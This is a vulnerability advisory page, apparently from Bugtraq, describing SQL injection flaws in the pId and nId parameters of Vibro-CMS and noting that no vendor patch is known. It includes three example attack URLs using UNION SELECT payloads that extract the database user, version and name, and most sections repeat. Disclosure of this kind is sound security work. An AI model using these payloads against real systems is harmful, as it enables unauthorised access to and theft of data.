Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
BID:32106
Info
Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32106 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2008 12:00AM |
| Updated: | Nov 06 2008 09:05PM |
| Credit: | StAkeR[at]hotmail[dot]it |
| Vulnerable: |
nicLOR Vibro-CMS 0 |
| Not Vulnerable: | |
Discussion
Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
Vibro-CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vibro-CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
http://www.example.com/view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
http://www.example.com/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
http://www.example.com/view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
http://www.example.com/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
Solution / Fix
Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Vibro-CMS 'pId' and 'nId' Parameters Multiple SQL Injection Vulnerabilities
References:
References:
- Vibro-CMS Homepage (nicLOR.net)